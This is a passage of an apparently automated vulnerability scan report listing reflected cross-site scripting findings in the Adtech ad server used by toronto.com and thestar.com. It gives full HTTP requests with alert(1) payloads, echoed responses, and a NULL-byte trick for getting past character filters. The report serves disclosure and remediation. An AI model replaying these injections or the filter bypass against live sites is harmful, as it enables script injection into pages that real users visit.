Referer: http://www.toronto.com/searchResults?q=%27%27aee2d%3C/title%3E%3Cscript%3Ealert%281%29%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 3040

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
://adserver.adtechus.com/adlink/5214/965669/0/5/AdId=865473;BnId=1;itime=224539738;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;nodecode=yes;link=&%0072162"-alert(1)-"24189c1587b=1http://verona.sites.toronto.com/\" target=\"_blank\" style=\"font-family: Arial, Helvetica, sans-serif;font-size:12px;font-weight: bold; color: #000000\">
...[SNIP]...

2.131. http://adserver.adtechus.com/addyn/3.0/5214.1/965669/0/-1/ADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/965669/0/-1/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ace65"-alert(1)-"e8841d7853d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/965669/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_searchresults_120x90_4;size=120x90;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;grp=854;misc=1290207887265;aduho=-360;rdclick=&ace65"-alert(1)-"e8841d7853d=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/searchResults?q=%27%27aee2d%3C/title%3E%3Cscript%3Ealert%281%29%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 3007

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
ttp://adserver.adtechus.com/adlink/5214/965669/0/5/AdId=616759;BnId=1;itime=210264485;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;nodecode=yes;link=&ace65"-alert(1)-"e8841d7853d=1http://www.brassrailtavern.com/\" target=\"_blank\" style=\"font-family: Arial, Helvetica, sans-serif;font-size:12px;font-weight: bold; color: #000000\">
...[SNIP]...

2.132. http://adserver.adtechus.com/addyn/3.0/5214.1/965696/0/-1/ADTECH [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/965696/0/-1/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00d51f7"-alert(1)-"405d6c1372f was submitted in the loc parameter. This input was echoed as d51f7"-alert(1)-"405d6c1372f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /addyn/3.0/5214.1/965696/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_searchresults_120x90_2;size=120x90;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;grp=854;misc=1290207887032;aduho=-360;rdclick=%00d51f7"-alert(1)-"405d6c1372f HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/searchResults?q=%27%27aee2d%3C/title%3E%3Cscript%3Ealert%281%29%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 3065

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
p://adserver.adtechus.com/adlink/5214/965696/0/5/AdId=608796;BnId=1;itime=210258088;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;nodecode=yes;link=%00d51f7"-alert(1)-"405d6c1372fhttp://www.chartreuserestaurant.com/home.html\" target=\"_blank\" style=\"font-family: Arial, Helvetica, sans-serif;font-size:12px;font-weight: bold; color: #000000\">
...[SNIP]...

2.133. http://adserver.adtechus.com/addyn/3.0/5214.1/965696/0/-1/ADTECH [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/965696/0/-1/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4cb20"-alert(1)-"79a77dae1 was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/965696/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_searchresults_120x90_2;size=120x90;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;grp=440;misc=1290207938340;aduho=-360;rdclick=4cb20"-alert(1)-"79a77dae1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/searchResults?q=''aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 2019

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
http://adserver.adtechus.com/adlink/5214/965696/0/5/AdId=616923;BnId=1;itime=210258241;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;nodecode=yes;link=4cb20"-alert(1)-"79a77dae1http://www.salonfortelliandspa.com\" target=\"_blank\">
...[SNIP]...

2.134. http://adserver.adtechus.com/addyn/3.0/5214.1/965696/0/-1/ADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/965696/0/-1/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29ee4"-alert(1)-"276366267fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/965696/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_searchresults_120x90_2;size=120x90;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;grp=854;misc=1290207887032;aduho=-360;rdclick=&29ee4"-alert(1)-"276366267fc=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/searchResults?q=%27%27aee2d%3C/title%3E%3Cscript%3Ealert%281%29%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 3069

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
ttp://adserver.adtechus.com/adlink/5214/965696/0/5/AdId=688903;BnId=1;itime=210263688;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;nodecode=yes;link=&29ee4"-alert(1)-"276366267fc=1http://www.homerama-adult-productsonline.com/\" target=\"_blank\" style=\"font-family: Arial, Helvetica, sans-serif;font-size:12px;font-weight: bold; color: #000000\">
...[SNIP]...

2.135. http://adserver.adtechus.com/addyn/3.0/5214.1/965696/0/-1/ADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/965696/0/-1/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0058259"-alert(1)-"6d85aaaefd5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 58259"-alert(1)-"6d85aaaefd5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /addyn/3.0/5214.1/965696/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_searchresults_120x90_2;size=120x90;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;grp=346;misc=1290207916534;aduho=-360;rdclick=&%0058259"-alert(1)-"6d85aaaefd5=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/searchResults?q=''aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 3058

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
er.adtechus.com/adlink/5214/965696/0/5/AdId=865473;BnId=1;itime=210265188;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;nodecode=yes;link=&%0058259"-alert(1)-"6d85aaaefd5=1http://verona.sites.toronto.com/\" target=\"_blank\" style=\"font-family: Arial, Helvetica, sans-serif;font-size:12px;font-weight: bold; color: #000000\">
...[SNIP]...

2.136. http://adserver.adtechus.com/addyn/3.0/5214.1/987201/0/-1/ADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/987201/0/-1/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1865'-alert(1)-'dd56bbacf1d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/987201/0/-1/ADTECH;loc=100;target=_blank;alias=thestar_searchresults_hub_237x90_1;size=237x90;key=;grp=124;misc=1290352490469;aduho=-360;rdclick=&f1865'-alert(1)-'dd56bbacf1d=1 HTTP/1.1
Accept: */*
Referer: http://www.thestar.com/searchresults?AssetType=article&stype=genSearch&q=%3E%3E&r=all:1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Cookie: CfP=1; JEB2=4CE6E57B6E651A454F57E65AF000985E; 1=AE775A24.133AFE.1.114457.50.0.4CE93776.D5E75.8E869E.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 1315

document.write("\n");
var curDateTime = new Date();
var offset = -(curDateTime.getTimezoneOffset());
if (offset > 0)
offset = "+" + offset;
if (window.adgroupid == undefined) {
window.adgroupid = Math
...[SNIP]...
+key3+key4;grp='+window.adgroupid+';misc='+new Date().getTime()+';aduho='+offset+';rdclick=http://adserver.adtechus.com/adlink/5214/987201/0/2666/AdId=1075291;BnId=7;itime=352643532;nodecode=yes;link=&f1865'-alert(1)-'dd56bbacf1d=1">
...[SNIP]...

2.137. http://adserver.adtechus.com/addyn/3.0/5214.1/987201/0/-1/ADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/987201/0/-1/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4338f"-alert(1)-"0cde283216b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/987201/0/-1/ADTECH;loc=100;target=_blank;alias=thestar_searchresults_hub_237x90_1;size=237x90;key=;grp=124;misc=1290352490469;aduho=-360;rdclick=&4338f"-alert(1)-"0cde283216b=1 HTTP/1.1
Accept: */*
Referer: http://www.thestar.com/searchresults?AssetType=article&stype=genSearch&q=%3E%3E&r=all:1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Cookie: CfP=1; JEB2=4CE6E57B6E651A454F57E65AF000985E; 1=AE775A24.133AFE.1.114457.50.0.4CE93776.D5E75.8E869E.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 1315

document.write("\n");
var curDateTime = new Date();
var offset = -(curDateTime.getTimezoneOffset());
if (offset > 0)
offset = "+" + offset;
if (window.adgroupid == undefined) {
window.adgroupid = Math
...[SNIP]...
<a href=\"http://adserver.adtechus.com/adlink/5214/987201/0/2666/AdId=1075291;BnId=7;itime=352640508;nodecode=yes;link=&4338f"-alert(1)-"0cde283216b=1http://adserver.adtechus.com/adlink/3.0/5294.1/1302170/0/2666/ADTECH;loc=300;key=key1+key2+key3+key4;rdclick=http://adserver.adtechus.com/adlink/5214/987201/0/2666/AdId=1075291;BnId=7;itime=352640508
...[SNIP]...

2.138. http://adserver.adtechus.com/addyn/3.0/5214.1/989782/0/-1/ADTECH [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/989782/0/-1/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f6c0'-alert(1)-'cfcbf3c4f49 was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/989782/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_searchresults_135x68_2;size=135x68;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;grp=576;misc=1290207897848;aduho=-360;rdclick=7f6c0'-alert(1)-'cfcbf3c4f49 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/searchResults?q=''aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 389

document.write('<a href="7f6c0'-alert(1)-'cfcbf3c4f49http://adserver.adtechus.com/?adlink/5214/1245416/0/2687/AdId=-3;BnId=0;itime=210254068;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;" target
...[SNIP]...

2.139. http://adserver.adtechus.com/addyn/3.0/5214.1/989782/0/-1/ADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/989782/0/-1/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4060e'-alert(1)-'f5107985fe1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/989782/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_searchresults_135x68_2;size=135x68;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;grp=576;misc=1290207897848;aduho=-360;rdclick=&4060e'-alert(1)-'f5107985fe1=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/searchResults?q=''aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 392

document.write('<a href="&4060e'-alert(1)-'f5107985fe1=1http://adserver.adtechus.com/?adlink/5214/1245416/0/2687/AdId=-3;BnId=0;itime=210255021;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;" targ
...[SNIP]...

2.140. http://adserver.adtechus.com/addyn/3.0/5274/1283049/0/154/ADTECH [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5274/1283049/0/154/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38cd8"-alert(1)-"aab3a344439 was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5274/1283049/0/154/ADTECH;loc=100;target=_blank;misc=1290348039434;rdclick=38cd8"-alert(1)-"aab3a344439 HTTP/1.1
Accept: */*
Referer: http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: CfP=1; JEB2=4CE6E57B6E651A454F57E65AF000985E; 1=AE775A24.133AFE.1.114457.4D.0.4CE91B1C.D5E75.8E869E.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19674

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
ICKVAR[0]?AT_CLICKVAR[0]:"clickTAG";
var AT_MULTICLICKSTR="?"+AT_CLICKVAR[0]+"=" + escape("http://adserver.adtechus.com/adlink/5274/1283049/0/154/AdId=889431;BnId=48;itime=348784578;nodecode=yes;link=38cd8"-alert(1)-"aab3a344439") + escape(AT_CLICK);
var AT_FLASHVARSSTR= "";
// if use microsite, dont add the first parameter
if (AT_MICROSITE=="") AT_FLASHVARSSTR = AT_CLICKVAR[0]+"=" + escape("http://adserver.adtechus.com/ad
...[SNIP]...

2.141. http://adserver.adtechus.com/addyn/3.0/5274/1283049/0/154/ADTECH [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5274/1283049/0/154/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a582'-alert(1)-'425d5f21da8 was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5274/1283049/0/154/ADTECH;loc=100;target=_blank;misc=1290348039434;rdclick=4a582'-alert(1)-'425d5f21da8 HTTP/1.1
Accept: */*
Referer: http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: CfP=1; JEB2=4CE6E57B6E651A454F57E65AF000985E; 1=AE775A24.133AFE.1.114457.4D.0.4CE91B1C.D5E75.8E869E.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19674

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
lick || AT_MICROSITE!="")
{    AT_COUNT=''
if ('1283049'!='_ADFC'+'_CUID_') AT_COUNT=escape('http://adserver.adtechus.com/adlink/5274/1283049/0/154/AdId=889431;BnId=48;itime=348815876;nodecode=yes;link=4a582'-alert(1)-'425d5f21da8')
AT_VARSTRING="?cli"+"ckTAG=javascript:void(win"+"dow.open('"+AT_COUNT+AT_CLICK+"','','"+AT_MICROSITE1283049+"'))";
AT_TARGET1283049="_self";
}
window.AT_ClickFn1283049= function (click)
{    click
...[SNIP]...

2.142. http://adserver.adtechus.com/addyn/3.0/5274/1283049/0/154/ADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5274/1283049/0/154/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d411c"-alert(1)-"7714f6d0503 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5274/1283049/0/154/ADTECH;loc=100;target=_blank;misc=1290348039434;rdclick=&d411c"-alert(1)-"7714f6d0503=1 HTTP/1.1
Accept: */*
Referer: http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001
Accept-Language: en-US
